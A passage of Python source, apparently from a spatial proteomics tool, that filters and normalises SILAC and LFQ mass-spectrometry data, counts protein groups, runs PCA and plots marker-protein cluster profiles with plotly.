This finds the primary canoncial protein ID in the protein group. If no canonical ID is present it selects the first isoform ID.
"""
p1 = el.split(";")[0]
if "-" not in p1:
return p1
else:
p = p1.split("-")[0]
if p in el.split(";"):
return p
else:
return p1
if self.acquisition == "SILAC - MQ":
# Index data
df_index = indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
# Run stringency filtering and normalization
df_stringency_mapfracstacked = stringency_silac(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_01_stacked = normalization_01_silac(df_stringency_mapfracstacked)
self.df_log_stacked = logarithmization_silac(df_stringency_mapfracstacked)
# format and reduce 0-1 normalized data for comparison with other experiments
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop(["Ratio H/L count", "Ratio H/L variability [%]"], inplace=True, axis=1)
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
# poopulate analysis summary dictionary with (meta)data
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"Ratio H/L count" : self.RatioHLcount,
"Ratio variability" : self.RatioVariability,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
# TODO this line needs to be removed.
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
elif self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ" or self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
#if not summed_MS_counts:
# summed_MS_counts = self.summed_MS_counts
#if not consecutiveLFQi:
# consecutiveLFQi = self.consecutiveLFQi
if self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ":
df_index = indexingdf()
elif self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
df_index = spectronaut_LFQ_indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_stringency_mapfracstacked = stringency_lfq(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_log_stacked = logarithmization_lfq(df_stringency_mapfracstacked)
self.df_01_stacked = normalization_01_lfq(df_stringency_mapfracstacked)
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"consecutive data points" : self.consecutiveLFQi,
"summed MS/MS counts" : self.summed_MSMS_counts,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#return self.df_01_stacked
elif self.acquisition == "Custom":
df_index = custom_indexing_and_normalization()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_01_stacked = df_index.stack(["Map", "Fraction"])
df_01_stacked = df_01_stacked.reset_index().merge(self.df_organellarMarkerSet, how="left", on="Gene names")
df_01_stacked.set_index([c for c in df_01_stacked.columns if c not in ["normalized profile"]], inplace=True)
df_01_stacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
self.df_01_stacked = df_01_stacked
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
else:
return "I do not know this"
def plot_log_data(self):
"""
Args:
self.df_log_stacked
Returns:
log_histogram: Histogram of log transformed data
"""
log_histogram = px.histogram(self.df_log_stacked.reset_index().sort_values(["Map", "Fraction"], key=natsort_list_keys),
x="log profile",
facet_col="Fraction",
facet_row="Map",
template="simple_white",
labels={"log profile": "log tranformed data ({})".format("LFQ intenisty" if self.acquisition != "SILAC - MQ" else "Ratio H/L")}
)
log_histogram.for_each_xaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.for_each_yaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.add_annotation(x=0.5, y=0, yshift=-50, xref="paper",showarrow=False, yref="paper",
text="log2(LFQ intensity)")
log_histogram.add_annotation(x=0, y=0.5, textangle=270, xref="paper",showarrow=False, yref="paper", xshift=-50,
text="count")
log_histogram.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
return log_histogram
def quantity_profiles_proteinGroups(self):
"""
Number of profiles, protein groups per experiment, and the data completness of profiles (total quantity, intersection) is calculated.
Args:
self:
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Typ
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
Returns:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; containign following information:
npg_t: protein groups per experiment total quantity
npgf_t = groups with valid profiles per experiment total quanitity
npr_t: profiles with any valid values
nprf_t = total number of valid profiles
npg_i: protein groups per experiment intersection
npgf_i = groups with valid profiles per experiment intersection
npr_i: profiles with any valid values in the intersection
nprf_i = total number of valid profiles in the intersection
npr_t_dc: profiles, % values != nan
nprf_t_dc = profiles, total, filtered, % values != nan
npr_i_dc: profiles, intersection, % values != nan
nprf_i_dc = profiles, intersection, filtered, % values != nan
df_npg | df_npgf: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f = protein groups, per fraction
or npgf_f = protein groups, filtered, per fraction
df_npg_dc | df_npgf_dc: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f_dc = protein groups, per fraction, % values != nan
or npgf_f_dc = protein groups, filtered, per fraction, % values != nan
"""
if self.acquisition == "SILAC - MQ":
df_index = self.df_index["Ratio H/L"]
df_01_stacked = self.df_01_stacked["normalized profile"]
elif self.acquisition.startswith("LFQ"):
df_index = self.df_index["LFQ intensity"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
elif self.acquisition == "Custom":
df_index = self.df_index["normalized profile"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
#unfiltered
npg_t = df_index.shape[0]
df_index_MapStacked = df_index.stack("Map")
npr_t = df_index_MapStacked.shape[0]/len(self.map_names)
npr_t_dc = 1-df_index_MapStacked.isna().sum().sum()/np.prod(df_index_MapStacked.shape)
#filtered
npgf_t = df_01_stacked.unstack(["Map", "Fraction"]).shape[0]
df_01_MapStacked = df_01_stacked.unstack("Fraction")
nprf_t = df_01_MapStacked.shape[0]/len(self.map_names)
nprf_t_dc = 1-df_01_MapStacked.isna().sum().sum()/np.prod(df_01_MapStacked.shape)
#unfiltered intersection
try:
df_index_intersection = df_index_MapStacked.groupby(level="Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_index_intersection = df_index_MapStacked.groupby(level="Protein IDs").filter(lambda x : len(x)==len(self.map_names))
npr_i = df_index_intersection.shape[0]/len(self.map_names)
npr_i_dc = 1-df_index_intersection.isna().sum().sum()/np.prod(df_index_intersection.shape)
npg_i = df_index_intersection.unstack("Map").shape[0]
#filtered intersection
try:
df_01_intersection = df_01_MapStacked.groupby(level = "Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_01_intersection = df_01_MapStacked.groupby(level = "Protein IDs").filter(lambda x : len(x)==len(self.map_names))
nprf_i = df_01_intersection.shape[0]/len(self.map_names)
nprf_i_dc = 1-df_01_intersection.isna().sum().sum()/np.prod(df_01_intersection.shape)
npgf_i = df_01_intersection.unstack("Map").shape[0]
# summarize in dataframe and save to attribute
df_quantity_pr_pg = pd.DataFrame(
{
"filtering": pd.Series(["before filtering", "before filtering", "after filtering", "after filtering"], dtype=np.dtype("O")),
"type": pd.Series(["total", "intersection", "total", "intersection"], dtype=np.dtype("O")),
"number of protein groups": pd.Series([npg_t, npg_i, npgf_t, npgf_i], dtype=np.dtype("float")),
"number of profiles": pd.Series([npr_t, npr_i, nprf_t, nprf_i], dtype=np.dtype("float")),
"data completeness of profiles": pd.Series([npr_t_dc, npr_i_dc, nprf_t_dc, nprf_i_dc], dtype=np.dtype("float"))})
self.df_quantity_pr_pg = df_quantity_pr_pg.reset_index()
self.analysis_summary_dict["quantity: profiles/protein groups"] = self.df_quantity_pr_pg.to_json()
#additional depth assessment per fraction
dict_npgf = {}
dict_npg = {}
list_npg_dc = []
list_npgf_dc = []
for df_intersection in [df_index_intersection, df_01_intersection]:
for fraction in self.fractions:
df_intersection_frac = df_intersection[fraction]
npgF_f_dc = 1-df_intersection_frac.isna().sum()/len(df_intersection_frac)
npgF_f = df_intersection_frac.unstack("Map").isnull().sum(axis=1).value_counts()
if fraction not in dict_npg.keys():
dict_npg[fraction] = npgF_f
list_npg_dc.append(npgF_f_dc)
else:
dict_npgf[fraction] = npgF_f
list_npgf_dc.append(npgF_f_dc)
df_npg = pd.DataFrame(dict_npg)
df_npg.index.name = "Protein Groups present in:"
df_npg.rename_axis("Fraction", axis=1, inplace=True)
df_npg = df_npg.stack("Fraction").reset_index()
df_npg = df_npg.rename({0: "Protein Groups"}, axis=1)
df_npg.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
df_npgf = pd.DataFrame(dict_npgf)
df_npgf.index.name = "Protein Groups present in:"
df_npgf.rename_axis("Fraction", axis=1, inplace=True)
df_npgf = df_npgf.stack("Fraction").reset_index()
df_npgf = df_npgf.rename({0: "Protein Groups"}, axis=1)
df_npgf.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
max_df_npg = df_npg["Protein Groups present in:"].max()
min_df_npg = df_npg["Protein Groups present in:"].min()
rename_numOFnans = {}
for x, y in zip(range(max_df_npg,min_df_npg-1, -1), range(max_df_npg+1)):
if y == 1:
rename_numOFnans[x] = "{} Map".format(y)
elif y == 0:
rename_numOFnans[x] = "PG not identified".format(y)
else:
rename_numOFnans[x] = "{} Maps".format(y)
for keys in rename_numOFnans.keys():
df_npg.loc[df_npg["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
df_npgf.loc[df_npgf["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
# summarize in dataframe and save to attributes
self.df_npg_dc = pd.DataFrame(
{
"Fraction" : pd.Series(self.fractions),
"Data completeness before filtering": pd.Series(list_npg_dc),
"Data completeness after filtering": pd.Series(list_npgf_dc),
})
self.df_npg = df_npg
self.df_npgf = df_npgf
def plot_quantity_profiles_proteinGroups(self):
"""
Args:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; further information: see above
Returns:
"""
df_quantity_pr_pg = self.df_quantity_pr_pg
layout = go.Layout(barmode="overlay",
xaxis_tickangle=90,
autosize=False,
width=300,
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
#title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
mirror=True),
template="simple_white")
fig_npg = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npg.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of protein groups"],
name=t))
fig_npg.update_layout(layout, title="Number of Protein Groups", yaxis=go.layout.YAxis(title="Protein Groups"))
fig_npr = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npr.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of profiles"],
name=t))
fig_npr.update_layout(layout, title="Number of Profiles")
df_quantity_pr_pg = df_quantity_pr_pg.sort_values("filtering")
fig_npr_dc = go.Figure()
for t in df_quantity_pr_pg["filtering"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["filtering"] == t]
fig_npr_dc.add_trace(go.Bar(
x=plot_df["type"],
y=plot_df["data completeness of profiles"],
name=t))
fig_npr_dc.update_layout(layout, title="Coverage", yaxis=go.layout.YAxis(title="Data completness"))
#fig_npr_dc.update_xaxes(tickangle=30)
fig_npg_F = px.bar(self.df_npg,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - before filtering",
width=500)
fig_npgf_F = px.bar(self.df_npgf,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - after filtering",
width=500)
fig_npg_F_dc = go.Figure()
for data_type in ["Data completeness after filtering", "Data completeness before filtering"]:
fig_npg_F_dc.add_trace(go.Bar(
x=self.df_npg_dc["Fraction"],
y=self.df_npg_dc[data_type],
name=data_type))
fig_npg_F_dc.update_layout(layout, barmode="overlay", title="Data completeness per fraction", yaxis=go.layout.YAxis(title=""), height=450, width=600)
return fig_npg, fig_npr, fig_npr_dc, fig_npg_F, fig_npgf_F, fig_npg_F_dc
def perform_pca(self):
"""
PCA will be performed, using logarithmized data.
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
"V-type proton ATP
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "LFQ intensity"
and "Ratio H/L", respectively; additionally the columns "MS/MS count" and "Ratio H/L count|Ratio H/L variability [%]" are stored
as single level indices
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to "normalized
profile"; the columns "normalized profile"" and "MS/MS count" are stored as single level indices; plotting is possible now
Returns:
self:
df_pca: df, PCA was performed, while keeping the information of the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Map" "Compartment"
df_pca_combined: df, PCA was performed across the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Compartment"
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are consistent
throughout all maps / coverage filtering.
"""
markerproteins = self.markerproteins
if self.acquisition == "SILAC - MQ":
df_01orlog_fracunstacked = self.df_log_stacked["log profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_log_stacked["log profile"].unstack(["Fraction", "Map"]).dropna()
elif self.acquisition.startswith("LFQ") or self.acquisition == "Custom":
df_01orlog_fracunstacked = self.df_01_stacked["normalized profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_01_stacked["normalized profile"].unstack(["Fraction", "Map"]).dropna()
pca = PCA(n_components=3)
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca = pd.DataFrame(pca.fit_transform(df_01orlog_fracunstacked))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_01orlog_fracunstacked.index
self.df_pca = df_pca.sort_index(level=["Gene names", "Compartment"])
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca_combined = pd.DataFrame(pca.fit_transform(df_01orlog_MapFracUnstacked))
df_pca_combined.columns = ["PC1", "PC2", "PC3"]
df_pca_combined.index = df_01orlog_MapFracUnstacked.index
self.df_pca_combined = df_pca_combined.sort_index(level=["Gene names", "Compartment"])
map_names = self.map_names
df_pca_all_marker_cluster_maps = pd.DataFrame()
df_pca_filtered = df_pca.unstack("Map").dropna()
for clusters in markerproteins:
for marker in markerproteins[clusters]:
try:
plot_try_pca = df_pca_filtered.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.append(
plot_try_pca)
if len(df_pca_all_marker_cluster_maps) == 0:
df_pca_all_marker_cluster_maps = df_pca_filtered.stack("Map")
else:
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.stack("Map")
self.df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.sort_index(level=["Gene names", "Compartment"])
def plot_global_pca(self, map_of_interest="Map1", cluster_of_interest="Proteasome", x_PCA="PC1", y_PCA="PC3", collapse_maps=False):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3",
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Map", "Compartment",
Returns:
pca_figure: global PCA plot
"""
if collapse_maps == False:
df_global_pca = self.df_pca.unstack("Map").swaplevel(0,1, axis=1)[map_of_interest].reset_index()
else:
df_global_pca = self.df_pca_combined.reset_index()
for i in self.markerproteins[cluster_of_interest]:
df_global_pca.loc[df_global_pca["Gene names"] == i, "Compartment"] = "Selection"
compartments = self.df_organellarMarkerSet["Compartment"].unique()
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment",
color_discrete_map=compartment_color,
title= "Protein subcellular localization by PCA for {}".format(map_of_interest)
if collapse_maps == False else "Protein subcellular localization by PCA of combined maps",
hover_data=["Protein IDs", "Gene names", "Compartment"],
template="simple_white",
opacity=0.9
)
return fig_global_pca
def plot_cluster_pca(self, cluster_of_interest="Proteasome"):
"""
PCA plot will be generated
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are
consistent throughout all maps / coverage filtering.
Returns:
pca_figure: PCA plot, for one protein cluster all maps are plotted
"""
df_pca_all_marker_cluster_maps = self.df_pca_all_marker_cluster_maps
map_names = self.map_names
markerproteins = self.markerproteins
try:
for maps in map_names:
df_setofproteins_PCA = pd.DataFrame()
for marker in markerproteins[cluster_of_interest]:
try:
plot_try_pca = df_pca_all_marker_cluster_maps.xs((marker, maps), level=["Gene names", "Map"],
drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
if maps == map_names[0]:
pca_figure = go.Figure(
data=[go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
)])
else:
pca_figure.add_trace(go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
))
pca_figure.update_layout(autosize=False, width=500, height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest),
template="simple_white")
return pca_figure
except:
return "This protein cluster was not quantified"
def calc_biological_precision(self):
"""
This function calculates the biological precision of all quantified protein clusters. It provides access to the data slice for all marker proteins, the distance profiles and the aggregated distances. It repeatedly applies the methods get_marker_proteins_unfiltered and calc_cluster_distances.
TODO: integrate optional arguments for calc_cluster_distances: complex_profile, distance_measure.
TODO: replace compatibiliy attributes with function return values and adjust attribute usage in downstream plotting functions.
Args:
self attributes:
markerproteins: dict, contains marker protein assignments
df_01_stacked: df, contains 0-1 nromalized data, required for execution of get_marker_proteins_unfiltered
Returns:
df_alldistances_individual_mapfracunstacked: df, distance profiles, fully unstacked
df_alldistances_aggregated_mapunstacked: df, profile distances (manhattan distance by default), fully unstacked
df_allclusters_01_unfiltered_mapfracunstacked: df, collected marker protein data
self attributes:
df_distance_noindex: compatibility version of df_alldistances_aggregated_mapunstacked
df_allclusters_01_unfiltered_mapfracunstacked
df_allclusters_clusterdist_fracunstacked_unfiltered: compatibility version of df_allclusters_01_unfiltered_mapfracunstacked (only used by quantificaiton_overview)
df_allclusters_clusterdist_fracunstacked: compatibility version of df_alldistances_individual_mapfracunstacked
genenames_sortedout_list = list of gene names with incomplete coverage
analysis_summary_dict entries:
"Manhattan distances" = df_distance_noindex
"Distances to the median profile": df_allclusters_clusterdist_fracunstacked, sorted and melted
"""
df_alldistances_individual_mapfracunstacked = pd.DataFrame()
df_alldistances_aggregated_mapunstacked = pd.DataFrame()
df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame()
for cluster in self.markerproteins.keys():
# collect data irrespective of coverage
df_cluster_unfiltered = self.get_marker_proteins_unfiltered(cluster)
df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked.append(df_cluster_unfiltered)
# filter for coverage and calculate distances
df_cluster = df_cluster_unfiltered.dropna()
if len(df_cluster) == 0:
continue
df_distances_aggregated, df_distances_individual = self.calc_cluster_distances(df_cluster)
df_alldistances_individual_mapfracunstacked = df_alldistances_individual_mapfracunstacked.append(df_distances_individual)
df_alldistances_aggregated_mapunstacked = df_alldistances_aggregated_mapunstacked.append(df_distances_aggregated)
if len(df_alldistances_individual_mapfracunstacked) == 0:
self.df_distance_noindex = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_clusterdist_fracunstacked_unfiltered = pd.DataFrame(columns = ["Fraction"])
self.df_allclusters_clusterdist_fracunstacked = pd.DataFrame(columns = ["Fraction"])
self.genenames_sortedout_list = "No clusters found"
return pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
else:
df_alldistances_aggregated_mapunstacked.columns.name = "Map"
## Get compatibility with plotting functions, by mimicking assignment of old functions:
# old output of distance_calculation
self.df_distance_noindex = df_alldistances_aggregated_mapunstacked.stack("Map").reset_index().rename({0: "distance"}, axis=1)
self.analysis_summary_dict["Manhattan distances"] = self.df_distance_noindex.to_json()
# old output of multiple_iterations
# self.df_allclusters_clusterdist_fracunstacked_unfiltered --> this won't exist anymore, replaced by:
self.df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked
# kept for testing of quantification table:
self.df_allclusters_clusterdist_fracunstacked_unfiltered = df_allclusters_01_unfiltered_mapfracunstacked.stack("Map")
# same as before, but now already abs
self.df_allclusters_clusterdist_fracunstacked = df_alldistances_individual_mapfracunstacked.stack("Map")
df_dist_to_median = self.df_allclusters_clusterdist_fracunstacked.stack("Fraction")
df_dist_to_median.name = "distance"
df_dist_to_median = df_dist_to_median.reindex(index=natsort.natsorted(df_dist_to_median.index))
self.analysis_summary_dict["Distances to the median profile"] = df_dist_to_median.reset_index().to_json()
self.genenames_sortedout_list = [el for el in df_allclusters_01_unfiltered_mapfracunstacked.index.get_level_values("Gene names")
if el not in df_alldistances_individual_mapfracunstacked.index.get_level_values("Gene names")]
return df_alldistances_individual_mapfracunstacked, df_alldistances_aggregated_mapunstacked, df_allclusters_01_unfiltered_mapfracunstacked
def get_marker_proteins_unfiltered(self, cluster):
"""
This funciton retrieves the 0-1 normalized data for any given protein cluster, unfiltered for coverage.
Args:
cluster: str, cluster name, should be one of self.markerproteins.keys()
self attributes:
df_01_stacked: df, contains the fully stacked 0-1 normalized data
markerproteins: dict, contains marker protein assignments
Returns:
df_cluster_unfiltered: df, unfiltered data for the selected cluster, maps and fractions are unstacked.
self attribtues:
None
"""
df_in = self.df_01_stacked["normalized profile"].unstack("Fraction")
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster_unfiltered = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster_unfiltered = df_cluster_unfiltered.append(df_p)
if len(df_cluster_unfiltered) == 0:
return df_cluster_unfiltered
# Unstack maps and add Cluster to index
df_cluster_unfiltered = df_cluster_unfiltered.unstack("Map")
df_cluster_unfiltered.set_index(pd.Index(np.repeat(cluster, len(df_cluster_unfiltered)), name="Cluster"), append=True, inplace=True)
return df_cluster_unfiltered
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
"""
Calculates the absolute differences in each fraction and the profile distances relative to the center of a cluster.
Per default this is the manhattan distance to the median profile.
Args:
df_cluster: df, 0-1 normalized profiles of cluster members, should already be filtered for full coverage and be in full wide format.
complex_profile: fun, function provided to apply for calculating the reference profile, default: np.median.
distance_measure: str, selected distance measure to calculate. Currently only 'manhattan' is supported, everything else raises a ValueError.
self attributes:
None
Returns:
df_distances_aggregated: df, proteins x maps, if stacked distance column is currently named 0 but contains manhattan distances.
df_distances_individual: df, same shape as df_cluster, but now with absolute differences to the reference.
self attribtues:
None
"""
df_distances_aggregated = pd.DataFrame()
ref_profile = pd.DataFrame(df_cluster.apply(complex_profile, axis=0, result_type="expand")).T
df_distances_individual = df_cluster.apply(lambda x: np.abs(x-ref_profile.iloc[0,:]), axis=1)
# loop over maps
maps = set(df_cluster.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_cluster.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[m], index=df_cluster.index)
df_distances_aggregated = pd.concat([df_distances_aggregated, d_m], axis=1)
df_distances_aggregated.columns.set_names(names="Map", inplace=True)
return df_distances_aggregated, df_distances_individual
def profiles_plot(self, map_of_interest="Map1", cluster_of_interest="Proteasome"):
"""
The function allows the plotting of filtered and normalized spatial proteomic data using plotly.express.
The median profile is also calculated based on the overlapping proteins. Profiles of proteins that are not quantified in all maps are dashed.
Args:
map_of_interest: str, must be in self.map_names
cluster_of_interest: str, must be in self.markerproteins.keys()
self attribtues:
df_allclusters_01_unfiltered_mapfracunstacked: df, contains 0-1 normalized profiles for all markerproteins detected in any map
Returns:
abundance_profiles_and_median_figure: plotly line plot, displaying the relative abundance profiles.
"""
try:
df_setofproteins = self.df_allclusters_01_unfiltered_mapfracunstacked.xs(cluster_of_interest, level="Cluster", axis=0)
df_setofproteins_median = df_setofproteins.dropna().xs(map_of_interest, level="Map", axis=1).median(axis=0)
# fractions get sorted
df_setofproteins = df_setofproteins.xs(map_of_interest, level="Map", axis=1).stack("Fraction")
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins.name = "normalized profile"
# make it available for plotting
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins = df_setofproteins.reset_index()
abundance_profiles_figure = px.line(df_setofproteins,
x="Fraction",
y="normalized profile",
color="Gene names",
line_group="Sequence" if "Sequence" in df_setofproteins.columns else "Gene names",
template="simple_white",
title="Relative abundance profile for {} of <br>the protein cluster: {}".format(map_of_interest, cluster_of_interest)
)
df_setofproteins_median.name = "normalized profile"
#fractions get sorted
df_setofproteins_median = df_setofproteins_median.reindex(index=natsort.natsorted(df_setofproteins_median.index))
# make it available for plotting
df_setofproteins_median = df_setofproteins_median.reset_index()
df_setofproteins_median.insert(0, "Gene names", np.repeat("Median profile", len(df_setofproteins_median)))
